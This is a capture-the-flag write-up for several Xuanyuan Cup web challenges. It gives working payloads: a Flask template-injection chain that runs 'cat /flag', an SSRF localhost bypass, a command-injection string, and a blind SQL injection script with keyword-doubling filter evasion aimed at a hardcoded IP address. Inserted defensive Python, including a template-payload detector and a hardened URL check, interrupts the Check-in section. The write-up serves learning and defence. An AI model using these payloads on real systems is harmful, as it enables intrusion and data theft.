Xuanyuan Cup
ezflask
The filter is worked around by using square-bracket access instead of the filtered form; the payload is then constructed as:
?name={{''["__class__"]["__base__"]["__subclasses__"]()[133]["__init__"]["__globals__"][request["args"]["a"]](request["args"]["b"])['read']()}}&a=popen&b=cat /flag
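The payload above relies on a filter that only looks for one spelling of attribute access. As an added illustration (not part of the original write-up), the Python below shows that point from the defender's side: a challenge-style check that only blocks dots lets the bracket form through, while a detector that folds both `a.b` and `a["b"]` spellings into the attribute names they reach flags either variant. The `DANGEROUS` set and the sample templates are constructed here; the actual fix for this class of bug is to never render user input as the template string and to pass it as a context variable instead.

```python
import re

# Attribute and name tokens that appear in sandbox-escape template payloads (constructed list).
DANGEROUS = {
    "__class__", "__base__", "__mro__", "__subclasses__",
    "__init__", "__globals__", "__builtins__", "popen", "system",
}

# Constructed samples: the write-up's bracket-only payload, a dotted variant, and a benign value.
BRACKET_PAYLOAD = """{{''["__class__"]["__base__"]["__subclasses__"]()[133]["__init__"]["__globals__"][request["args"]["a"]](request["args"]["b"])['read']()}}"""
DOTTED_PAYLOAD = "{{''.__class__.__base__.__subclasses__()}}"
BENIGN = "{{ name }}"


def dot_only_filter(template: str) -> bool:
    """Challenge-style check: accepts anything without a dot, so bracket access walks straight through."""
    return "." not in template


def reached_attributes(template: str) -> set:
    """Collect every attribute name reached via a.b, a['b'] or a["b"] spellings."""
    names = set(re.findall(r"\.([A-Za-z_]\w*)", template))
    names |= set(re.findall(r"\[\s*['\"]([A-Za-z_]\w*)['\"]\s*\]", template))
    return names


def is_suspicious(template: str) -> bool:
    """True when the template reaches any name in DANGEROUS, whichever spelling it uses."""
    return bool(reached_attributes(template) & DANGEROUS)


if __name__ == "__main__":
    for sample in (BRACKET_PAYLOAD, DOTTED_PAYLOAD, BENIGN):
        print(f"dot-only filter passes: {dot_only_filter(sample)!s:5}  suspicious: {is_suspicious(sample)}")
```

The dot-only check accepts the bracket payload and rejects the harmless `{{ name }}` only by luck of its spelling; the attribute-based detector gives the same verdict for both spellings of the same traversal.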
ezJS
Read the source and send the request directly.
if (scoreNow === 100000000000) {
    fetch('getflag.php', {
        method: 'POST',
        headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
        body: 'score=' + scoreNow
    })
    .then(response => response.text())
    .then(data => { alert("恭喜你!flag是:" + data); })
    .catch(error => { console.error('错误:', error); });
}
ezssrf
The key point is to satisfy the following condition:
$x['host'] === null && $x['scheme'] === 'http'
payload:
?url=http:/127.0.0.1/flag
Then visit it.
Check-in
Only the key steps are written down.
payload:
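As an added illustration (not part of the original write-up), the Python below shows why the condition above is satisfiable and how a defender would close it. Python's `urlsplit`, like PHP's `parse_url`, sees no host in `http:/127.0.0.1/flag`, so a check that only requires "no host and scheme http" passes; a lenient HTTP client (libcurl is assumed here as the challenge's back end) still reads the single slash as `http://` and connects to loopback. `strict_check` is a hypothetical hardened version that normalizes the URL first, requires a real host, and refuses loopback, private and link-local addresses.

```python
from ipaddress import ip_address
from urllib.parse import urlsplit

# Constructed sample inputs, modelled on the write-up's payload and an ordinary URL.
PAYLOAD = "http:/127.0.0.1/flag"
NORMAL = "http://example.com/index.html"


def weak_check(url: str) -> bool:
    """Mirror of the challenge's condition: host must be absent and scheme must be http."""
    parts = urlsplit(url)
    return parts.hostname is None and parts.scheme == "http"


def normalize_url(url: str) -> str:
    """Rewrite 'scheme:/path' to 'scheme://path', the way lenient clients such as libcurl
    interpret it (assumption about the client; the parser itself does not do this)."""
    scheme, sep, rest = url.partition(":")
    if sep and rest.startswith("/") and not rest.startswith("//"):
        rest = "/" + rest
    return scheme + sep + rest


def strict_check(url: str) -> bool:
    """Defender's check: parse the normalized form, require a real host,
    and reject loopback, private, link-local and reserved addresses."""
    parts = urlsplit(normalize_url(url))
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    try:
        ip = ip_address(parts.hostname)
    except ValueError:
        # A DNS name: the same address test must be applied again after resolution,
        # at connect time, to defend against rebinding.
        return True
    return not (ip.is_loopback or ip.is_private or ip.is_link_local or ip.is_reserved)


if __name__ == "__main__":
    for url in (PAYLOAD, NORMAL, "http://10.0.0.5/admin"):
        print(f"{url:32} weak={weak_check(url)!s:5} normalized={normalize_url(url):32} strict={strict_check(url)}")
```

The weak condition is true for the payload precisely because the parser produced no host; the strict version decides on the form the HTTP client will actually use rather than on the raw string.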
?cmd=nl+%2Fflag%3f
ezRCE
readgzfile
ezSQL
Spaces and select are filtered.
Use inline comments plus double-writing of the keyword.
After getting the flag, base64-decode it.
exp:
import requests
import time

# Example request: http://27.25.151.26:4925/?id=1/**/and/**/(if(ascii(substr((seselectlect/**/group_concat(schema_name)/**/from/**/information_schema.schemata),1,1))>32,1,0))
url = "http://27.25.151.26:4925/"
flag = ""

# Each query below was run in turn; the trailing comment records what it returned.
# select = "select/**/version()"  # 10.5.28-MariaDB-0+deb11u2
select = "seselectlect/**/group_concat(schema_name)/**/from/**/information_schema.schemata"  # information_schema,performamce_schema,mysql,ctf,xuanyuanCTF
select = "seselectlect/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema='xuanyuanCTF'"  # xuyuanCTF info
select = "seselectlect/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=%27xuanyuanCTF%27/**/and/**/table_name='info'"  # xuyuanCTF id,title,content
select = "seselectlect/**/group_concat(id,title,content)/**/from/**/xuanyuanCTF.info"  # 1F1AG ZmxhZ3vmrILov47mnaXli7DovanovpXmna99 -> flag{欢迎来到轩辕杯}

# Boolean-based blind extraction: binary-search the ASCII value of each character.
for i in range(1, 100):
    # if i <= 25:
    #     continue
    left = 32
    right = 127
    mid = (left + right) // 2
    while left < right:
        poc1 = f"?id=1/**/and/**/(if(ascii(substr(({select}),{i},1))>{mid},1,0))"
        payload = poc1
        time.sleep(1)
        r = requests.get(url + payload)
        if "admin" in r.text:
            left = mid + 1
        else:
            right = mid
        mid = (left + right) // 2
    flag += chr(mid)
    print(flag)